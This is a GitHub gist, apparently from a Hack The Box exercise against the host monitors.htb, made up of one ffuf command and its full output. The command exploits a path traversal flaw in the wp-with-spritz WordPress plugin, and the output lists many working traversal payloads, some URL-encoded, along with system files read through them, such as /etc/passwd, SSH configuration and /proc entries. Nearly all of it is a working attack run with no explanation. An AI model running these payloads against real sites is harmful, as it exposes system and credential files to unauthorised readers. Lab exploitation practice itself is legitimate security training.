Skip to content

Instantly share code, notes, and snippets.

@oxtd
Created September 11, 2021 06:07
Show Gist options
  • Select an option

  • Save oxtd/712c2487361c392e145d7427378c4e86 to your computer and use it in GitHub Desktop.

Select an option

Save oxtd/712c2487361c392e145d7427378c4e86 to your computer and use it in GitHub Desktop.
2
ffuf -c -u http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../..//FUZZ -w file_inclusion_linux.txt -fw 1 -fs 0 -fl 1
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../..//FUZZ
:: Wordlist : FUZZ: file_inclusion_linux.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 0
:: Filter : Response words: 1
:: Filter : Response lines: 1
________________________________________________
../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../../../../../etc/hosts [Status: 200, Size: 223, Words: 22, Lines: 10]
../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../etc/passwd&=%3C%3C%3C%3C [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
/../../../../../../../../../../etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
/./././././././././././etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
/boot/grub/menu.lst [Status: 200, Size: 4716, Words: 612, Lines: 155]
/boot/grub/grub.cfg [Status: 200, Size: 8322, Words: 866, Lines: 250]
/etc/apache2/mods-available/deflate.conf [Status: 200, Size: 395, Words: 23, Lines: 11]
/etc/apache2/mods-available/autoindex.conf [Status: 200, Size: 3374, Words: 313, Lines: 97]
/etc/apache2/mods-available/dir.conf [Status: 200, Size: 157, Words: 15, Lines: 6]
/etc/apache2/envvars [Status: 200, Size: 1782, Words: 190, Lines: 48]
/etc/apache2/mods-available/mime.conf [Status: 200, Size: 7676, Words: 943, Lines: 252]
/etc/apache2/mods-available/proxy.conf [Status: 200, Size: 822, Words: 124, Lines: 28]
/etc/adduser.conf [Status: 200, Size: 3028, Words: 402, Lines: 89]
/etc/apache2/apache2.conf [Status: 200, Size: 7224, Words: 942, Lines: 228]
/etc/apache2/mods-available/setenvif.conf [Status: 200, Size: 1280, Words: 113, Lines: 33]
/etc/apache2/mods-available/ssl.conf [Status: 200, Size: 3110, Words: 431, Lines: 86]
/etc/apache2/mods-enabled/alias.conf [Status: 200, Size: 843, Words: 115, Lines: 25]
/etc/apache2/mods-enabled/dir.conf [Status: 200, Size: 157, Words: 15, Lines: 6]
/etc/apache2/mods-enabled/deflate.conf [Status: 200, Size: 395, Words: 23, Lines: 11]
/etc/apache2/mods-enabled/negotiation.conf [Status: 200, Size: 724, Words: 109, Lines: 21]
/etc/apache2/mods-enabled/mime.conf [Status: 200, Size: 7676, Words: 943, Lines: 252]
/etc/apache2/sites-enabled/000-default.conf [Status: 200, Size: 1633, Words: 205, Lines: 38]
/etc/apache2/mods-enabled/status.conf [Status: 200, Size: 749, Words: 82, Lines: 30]
/etc/apache2/ports.conf [Status: 200, Size: 320, Words: 36, Lines: 16]
/etc/apt/sources.list [Status: 200, Size: 3055, Words: 295, Lines: 53]
/etc/bash.bashrc [Status: 200, Size: 2319, Words: 399, Lines: 72]
/etc/ca-certificates.conf [Status: 200, Size: 6841, Words: 64, Lines: 168]
/etc/ca-certificates.conf.dpkg-old [Status: 200, Size: 6777, Words: 64, Lines: 167]
/etc/crypttab [Status: 200, Size: 54, Words: 5, Lines: 2]
/etc/crontab [Status: 200, Size: 720, Words: 103, Lines: 15]
/etc/deluser.conf [Status: 200, Size: 604, Words: 86, Lines: 21]
/etc/default/grub [Status: 200, Size: 1211, Words: 141, Lines: 34]
/etc/debconf.conf [Status: 200, Size: 2969, Words: 411, Lines: 84]
/etc/dhcp/dhclient.conf [Status: 200, Size: 1735, Words: 168, Lines: 55]
/etc/fstab [Status: 200, Size: 89, Words: 6, Lines: 3]
/etc/fuse.conf [Status: 200, Size: 280, Words: 38, Lines: 9]
/etc/host.conf [Status: 200, Size: 92, Words: 16, Lines: 4]
/etc/hdparm.conf [Status: 200, Size: 4861, Words: 726, Lines: 139]
/etc/hosts.deny [Status: 200, Size: 711, Words: 128, Lines: 18]
/etc/hosts [Status: 200, Size: 223, Words: 22, Lines: 10]
/etc/hosts.allow [Status: 200, Size: 411, Words: 82, Lines: 11]
/etc/issue [Status: 200, Size: 26, Words: 5, Lines: 3]
/etc/issue.net [Status: 200, Size: 19, Words: 3, Lines: 2]
/etc/kernel-img.conf [Status: 200, Size: 144, Words: 17, Lines: 7]
/etc/init.d/apache2 [Status: 200, Size: 8181, Words: 1500, Lines: 356]
/etc/ld.so.conf [Status: 200, Size: 34, Words: 2, Lines: 3]
/etc/ldap/ldap.conf [Status: 200, Size: 332, Words: 23, Lines: 18]
/etc/logrotate.conf [Status: 200, Size: 703, Words: 119, Lines: 37]
/etc/login.defs [Status: 200, Size: 10550, Words: 1638, Lines: 342]
/etc/lsb-release [Status: 200, Size: 105, Words: 3, Lines: 5]
/etc/ltrace.conf [Status: 200, Size: 14867, Words: 1011, Lines: 544]
/etc/manpath.config [Status: 200, Size: 5174, Words: 530, Lines: 132]
/etc/modules [Status: 200, Size: 195, Words: 33, Lines: 6]
/etc/mtab [Status: 200, Size: 3741, Words: 191, Lines: 39]
/etc/network/interfaces [Status: 200, Size: 325, Words: 43, Lines: 13]
/etc/mysql/my.cnf [Status: 200, Size: 681, Words: 89, Lines: 21]
/etc/networks [Status: 200, Size: 91, Words: 11, Lines: 3]
/etc/nsswitch.conf [Status: 200, Size: 513, Words: 131, Lines: 21]
/etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
/etc/os-release [Status: 200, Size: 386, Words: 6, Lines: 13]
/etc/pam.conf [Status: 200, Size: 552, Words: 65, Lines: 16]
/etc/passwd- [Status: 200, Size: 1606, Words: 10, Lines: 32]
/etc/profile [Status: 200, Size: 581, Words: 145, Lines: 28]
/etc/resolv.conf [Status: 200, Size: 715, Words: 97, Lines: 19]
/etc/rpc [Status: 200, Size: 887, Words: 36, Lines: 41]
/etc/security/access.conf [Status: 200, Size: 4620, Words: 691, Lines: 123]
/etc/security/sepermit.conf [Status: 200, Size: 419, Words: 106, Lines: 12]
/etc/security/namespace.conf [Status: 200, Size: 1440, Words: 219, Lines: 29]
/etc/security/limits.conf [Status: 200, Size: 2150, Words: 746, Lines: 57]
/etc/security/pam_env.conf [Status: 200, Size: 2972, Words: 429, Lines: 74]
/etc/security/group.conf [Status: 200, Size: 3635, Words: 690, Lines: 107]
/etc/security/time.conf [Status: 200, Size: 2179, Words: 342, Lines: 66]
/etc/sensors3.conf [Status: 200, Size: 10368, Words: 2583, Lines: 524]
/etc/ssh/ssh_host_dsa_key.pub [Status: 200, Size: 602, Words: 3, Lines: 2]
/etc/ssh/ssh_config [Status: 200, Size: 1580, Words: 248, Lines: 52]
/etc/ssh/sshd_config [Status: 200, Size: 3291, Words: 296, Lines: 124]
/etc/sysctl.conf [Status: 200, Size: 2683, Words: 277, Lines: 78]
/etc/updatedb.conf [Status: 200, Size: 403, Words: 42, Lines: 5]
/proc/cmdline [Status: 200, Size: 109, Words: 4, Lines: 2]
/proc/cpuinfo [Status: 200, Size: 2194, Words: 271, Lines: 57]
/proc/devices [Status: 200, Size: 522, Words: 93, Lines: 57]
/proc/interrupts [Status: 200, Size: 4262, Words: 2002, Lines: 68]
/proc/loadavg [Status: 200, Size: 27, Words: 5, Lines: 2]
/proc/ioports [Status: 200, Size: 1537, Words: 313, Lines: 59]
/proc/modules [Status: 200, Size: 4974, Words: 451, Lines: 91]
/proc/mounts [Status: 200, Size: 3741, Words: 191, Lines: 39]
/proc/meminfo [Status: 200, Size: 1335, Words: 459, Lines: 49]
/proc/net/arp [Status: 200, Size: 238, Words: 116, Lines: 4]
/proc/net/dev [Status: 200, Size: 833, Words: 498, Lines: 8]
/proc/net/tcp [Status: 200, Size: 1050, Words: 371, Lines: 8]
/proc/net/route [Status: 200, Size: 640, Words: 355, Lines: 6]
/proc/net/fib_trie [Status: 200, Size: 2293, Words: 1025, Lines: 81]
/proc/partitions [Status: 200, Size: 209, Words: 105, Lines: 9]
/proc/net/udp [Status: 200, Size: 640, Words: 163, Lines: 6]
/proc/self/fd/10 [Status: 200, Size: 2664, Words: 208, Lines: 24]
/proc/sched_debug [Status: 200, Size: 92564, Words: 36504, Lines: 1041]
/proc/self/stat [Status: 200, Size: 322, Words: 52, Lines: 2]
/proc/self/status [Status: 200, Size: 1348, Words: 92, Lines: 55]
/proc/stat [Status: 200, Size: 3211, Words: 1497, Lines: 11]
/proc/self/mounts [Status: 200, Size: 3741, Words: 191, Lines: 39]
/proc/version [Status: 200, Size: 152, Words: 17, Lines: 2]
/proc/swaps [Status: 200, Size: 100, Words: 32, Lines: 3]
/proc/self/net/arp [Status: 200, Size: 238, Words: 116, Lines: 4]
/usr/share/adduser/adduser.conf [Status: 200, Size: 3028, Words: 402, Lines: 89]
/var/log/dpkg.log [Status: 200, Size: 17576, Words: 1062, Lines: 214]
etc%2fpasswd [Status: 200, Size: 1621, Words: 11, Lines: 32]
etc/passwd [Status: 200, Size: 1621, Words: 11, Lines: 32]
:: Progress: [2247/2247] :: Job [1/1] :: 190 req/sec :: Duration: [0:00:31] :: Errors: 1 ::
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment